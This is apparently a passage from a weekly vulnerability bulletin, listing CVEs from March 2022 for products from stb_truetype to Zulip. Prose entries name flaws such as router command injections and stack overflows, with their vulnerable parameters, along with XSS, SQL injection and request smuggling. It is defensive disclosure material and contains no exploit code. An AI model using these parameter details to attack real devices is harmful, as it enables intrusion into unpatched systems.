MISC stb_trutype.h — stb_trutype.h stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25515
MISC stb_trutype.h — stb_trutype.h
  stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. 2022-03-17 not yet calculated CVE-2022-25514
MISC stormshield — network_security
  In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service. 2022-03-15 not yet calculated CVE-2022-23989
MISC suse — linux_enterprise_server
  A Insecure Temporary File vulnerability in grub-once of grub2 in SUSE Linux Enterprise Server 15 SP4, openSUSE Factory allows local attackers to truncate arbitrary files. This issue affects: SUSE Linux Enterprise Server 15 SP4 grub2 versions prior to 2.06-150400.7.1. SUSE openSUSE Factory grub2 versions prior to 2.06-18.1. 2022-03-16 not yet calculated CVE-2021-46705
CONFIRM sylius — sylius Sylius is an open source eCommerce platform. Prior to versions 1.10.11 and 1.11.2, the reset password token was not set to null after the password was changed. The same token could be used several times, which could result in leak of the existing token and unauthorized password change. The issue is fixed in versions 1.10.11 and 1.11.2. As a workaround, overwrite the `SyliusBundleApiBundleCommandHandlerResetPasswordHandler` class with code provided by the maintainers and register it in a container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-14 not yet calculated CVE-2022-24743
MISC
CONFIRM
MISC sylius — sylius Sylius is an open source eCommerce platform. In versions prior to 1.9.10, 1.10.11, and 1.11.2, it is possible to upload an SVG file containing cross-site scripting (XSS) code in the admin panel. In order to perform a XSS attack, the file itself has to be open in a new card or loaded outside of the IMG tag. The problem applies both to the files opened on the admin panel and shop pages. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. As a workaround, require a library that adds on-upload file sanitization and overwrite the service before writing the file to the filesystem. The GitHub Security Advisory contains more specific information about the workaround. 2022-03-14 not yet calculated CVE-2022-24749
CONFIRM
MISC
MISC
MISC sylius — sylius
  Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, it is possible for a page controlled by an attacker to load the website within an iframe. This will enable a clickjacking attack, in which the attacker’s page overlays the target application’s interface with a different interface provided by the attacker. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. Every response from app should have an X-Frame-Options header set to: “sameorigin“. To achieve that, add a new `subscriber` in the app. 2022-03-14 not yet calculated CVE-2022-24733
CONFIRM
MISC
MISC
MISC sylius — sylius
  Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, any other user can view the data if browser tab remains unclosed after log out. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. The application must strictly redirect to login page even browser back button is pressed. Another possibility is to set more strict cache policies for restricted content. 2022-03-14 not yet calculated CVE-2022-24742
MISC
CONFIRM
MISC
MISC sylius — sylius
  SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`SyliusComponentGridSortingSorter.php` class and register it in the container. More information about this workaround is available in the GitHub Security Advisory. 2022-03-15 not yet calculated CVE-2022-24752
MISC
CONFIRM
MISC
MISC
MISC syltek — syltek
  Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification. 2022-03-18 not yet calculated CVE-2021-4031
CONFIRM sync_qcloud_cos — sync_qcloud_cos
  The Sync QCloud COS WordPress plugin before 2.0.1 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0659
MISC sysend.js — sysend.js
  sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages. 2022-03-14 not yet calculated CVE-2022-24762
CONFIRM
MISC
MISC
MISC taocms — taocms
  taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file. 2022-03-18 not yet calculated CVE-2022-25578
MISC
MISC team_circle_image_slider_with_lightbox — team_circle_image_slider_with_lightbox
  The Team Circle Image Slider With Lightbox WordPress plugin before 1.0.16 does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 2022-03-14 not yet calculated CVE-2022-0648
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25428
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25427
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25429
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function. 2022-03-18 not yet calculated CVE-2022-25431
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the urls parameter in the saveparentcontrolinfo function. 2022-03-18 not yet calculated CVE-2022-25433
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the firewallen parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25434
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25437
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetStaticRoutecfg function. 2022-03-18 not yet calculated CVE-2022-25435
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25438
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25455
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedstarttime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25446
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the day parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25448
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25449
MISC tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. 2022-03-18 not yet calculated CVE-2022-25450
MISC tenda — routers Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function. 2022-03-18 not yet calculated CVE-2022-25451
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25452
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function. 2022-03-18 not yet calculated CVE-2022-25453
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function. 2022-03-18 not yet calculated CVE-2022-25454
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function. 2022-03-18 not yet calculated CVE-2022-25456
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. 2022-03-18 not yet calculated CVE-2022-25439
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function. 2022-03-18 not yet calculated CVE-2022-25445
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25457
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function. 2022-03-18 not yet calculated CVE-2022-25458
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25459
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25460
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function. 2022-03-18 not yet calculated CVE-2022-25441
MISC tenda — routers Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. 2022-03-18 not yet calculated CVE-2022-25440
MISC tenda — routers Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. 2022-03-18 not yet calculated CVE-2022-25447
MISC tenda — routers
  Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function. 2022-03-18 not yet calculated CVE-2022-25461
MISC tibco — multiple_products
  The Server component of TIBCO Software Inc.’s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. Affected releases are TIBCO Software Inc.’s TIBCO JasperReports Library: version 7.9.0, TIBCO JasperReports Library for ActiveMatrix BPM: version 7.9.0, TIBCO JasperReports Server: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and 7.9.1, and TIBCO JasperReports Server for Microsoft Azure: version 7.9.1. 2022-03-15 not yet calculated CVE-2022-22771
CONFIRM
CONFIRM tiny_file_manager — tiny_file_manager
  A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution. 2022-03-15 not yet calculated CVE-2021-45010
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC tinyfilemanager — tinyfilemanager
  Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7. 2022-03-17 not yet calculated CVE-2022-1000
MISC
CONFIRM totlink — routers
  Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the host_time parameter. 2022-03-15 not yet calculated CVE-2022-26214
MISC totolink — firmware
  Totolink X5000R_Firmware v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function setNtpCfg, via the tz parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26213
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26209
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26207
MISC totolink — routers Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27003
MISC totolink — routers Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27004
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function CloudACMunualUpdate, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26211
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26206
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26208
MISC totolink — routers Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26210
MISC totolink — routers
  Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-27005
MISC totolink — routers
  Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDeviceName, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. 2022-03-15 not yet calculated CVE-2022-26212
MISC unisoc — chipset
  The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device’s screen, record video of the device’s physical environment, or modify data. 2022-03-18 not yet calculated CVE-2022-27250
MISC veeam — agent_for_windows
  Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges. 2022-03-17 not yet calculated CVE-2022-26503
MISC
MISC veeam — backup_and_replication **REJECT** Veeam Backup & Replication 10.x and 11.x has an Untrusted Search Path. 2022-03-18 not yet calculated CVE-2022-26502 veeam — backup_and_replication Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2). 2022-03-17 not yet calculated CVE-2022-26501
MISC
MISC veeam — backup_and_replication Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code. 2022-03-17 not yet calculated CVE-2022-26500
MISC
MISC veeam — backup_and_replication
  Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe 2022-03-17 not yet calculated CVE-2022-26504
MISC
MISC vim — vim
  Heap-based Buffer Overflow occurs in vim in GitHub repository vim/vim prior to 8.2.4563. 2022-03-14 not yet calculated CVE-2022-0943
MISC
CONFIRM volto — volto
  Volto is a ReactJS-based frontend for the Plone Content Management System. Between versions 14.0.0-alpha.5 and 15.0.0-alpha.0, a user could have their authentication cookie replaced with an authentication cookie from another user, effectively giving them control of the other user’s account and privileges. This occurs when using an outdated version of the `react-cookie` library and a server is under high load. A proof of concept does not currently exist, but it is possible for this issue to occur in the wild. The patch and fix is present in Volto 15.0.0-alpha.0. As a workaround, one may manually upgrade the `react-cookie` package to 4.1.1 and then override all Volto components that use this library. 2022-03-14 not yet calculated CVE-2022-24740
CONFIRM
MISC voting_contest — voting_contest
  The WP Voting Contest WordPress plugin through 2.1 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue 2022-03-14 not yet calculated CVE-2022-0321
MISC waitress — waitress
  Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python’s `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead. 2022-03-17 not yet calculated CVE-2022-24761
MISC
CONFIRM
MISC wavlink — routers A vulnerability is in the ‘live_mfg.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router. 2022-03-17 not yet calculated CVE-2021-44260
MISC wavlink — routers
  A vulnerability is in the ‘wx.html’ page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner. 2022-03-17 not yet calculated CVE-2021-44259
MISC whale_browser — whale_browser Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises. 2022-03-17 not yet calculated CVE-2022-24074
CONFIRM whale_browser — whale_browser Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files. 2022-03-17 not yet calculated CVE-2022-24075
CONFIRM whale_browser — whale_browser
  The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool. 2022-03-17 not yet calculated CVE-2022-24072
CONFIRM whale_browser — whale_browser
  The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store. 2022-03-17 not yet calculated CVE-2022-24073
CONFIRM wireapp — wire-server
  wire-server provides back end services for Wire, an open source messenger. In versions of wire-server prior to the 2022-01-27 release, it was possible to craft DSA Signatures to bypass SAML SSO and impersonate any Wire user with SAML credentials. In teams with SAML, but without SCIM, it was possible to create new accounts with fake SAML credentials. Under certain conditions that can be established by an attacker, an upstream library for parsing, rendering, signing, and validating SAML XML data was accepting public keys as trusted that were provided by the attacker in the signature. As a consequence, the attacker could login as any user in any Wire team with SAML SSO enabled. If SCIM was not enabled, the attacker could also create new users with new SAML NameIDs. In order to exploit this vulnerability, the attacker needs to know the SSO login code (distributed to all team members with SAML credentials and visible in the Team Management app), the SAML EntityID identifying the IdP (a URL not considered sensitive, but usually hard to guess, also visible in Team Management), and the SAML NameID of the user (usually an email address or a nick). The issue has been fixed in wire-server `2022-01-27` and is already deployed on all Wire managed services. On premise instances of wire-server need to be updated to `2022-01-27`, so that their backends are no longer affected. There are currently no known workarounds. More detailed information about how to reproduce the vulnerability and mitigation strategies is available in the GitHub Security Advisory. 2022-03-16 not yet calculated CVE-2022-23610
MISC
CONFIRM wp-downloadmanager — wp-downloadmanager
  Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). 2022-03-18 not yet calculated CVE-2021-44760
CONFIRM
CONFIRM wp-downloadmanager — wp-downloadmanager
  Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url. 2022-03-18 not yet calculated CVE-2022-25605
CONFIRM
CONFIRM wp_home_page_menu — qp_home_page_menu
  The WP Home Page Menu WordPress plugin before 3.1 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0684
MISC
CONFIRM wps_office_version — wps_office_version The installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. 2022-03-17 not yet calculated CVE-2022-25969
JVN
CONFIRM wps_office_version — wps_office_version
  The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer. 2022-03-17 not yet calculated CVE-2022-26081
JVN
CONFIRM wps_presentation — wps_presentation
  WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files(‘current directory type’ DLL loading). 2022-03-17 not yet calculated CVE-2022-26511
JVN
CONFIRM x2crm — x2crm
  A Cross-Site Scripting (XSS) attack can cause arbitrary code (javascript) to run in a user’s browser while the browser is connected to a trusted website. As the vehicle for the attack, the application targets the users and not the application itself. Additionally, the XSS payload is executed when the user attempts to access any page of the CRM. 2022-03-16 not yet calculated CVE-2021-33853
MISC xbit — xbit A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the “n” (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code. 2022-03-16 not yet calculated CVE-2021-45822
MISC
MISC
MISC xbit — xbit
  A blind SQL injection vulnerability exists in Xbtit 3.1 via the sid parameter in ajaxchat/getHistoryChatData.php file that is accessible by a registered user. As a result, a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to get a remote code execution on the remote web server. 2022-03-16 not yet calculated CVE-2021-45821
MISC
MISC
MISC xebd — accel-ppp
  The telnet_input_char function in opt/src/accel-pppd/cli/telnet.c suffers from a memory corruption vulnerability, whereby user input cmdline_len is copied into a fixed buffer b->buf without any bound checks. If the server connects with a malicious client, crafted client requests can remotely trigger this vulnerability. 2022-03-16 not yet calculated CVE-2022-0982
MISC yokogawa — widefield3
  In Yokogawa WideField3 R1.01 – R4.03, a buffer overflow could be caused when a user loads a maliciously crafted project file. 2022-03-18 not yet calculated CVE-2020-16232
CONFIRM
CONFIRM zero_spam — zero_spam
  The WordPress Zero Spam WordPress plugin before 5.2.11 does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection 2022-03-14 not yet calculated CVE-2022-0254
CONFIRM
MISC
CONFIRM zulip — zulip
  Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds. 2022-03-16 not yet calculated CVE-2022-24751
MISC
MISC
CONFIRM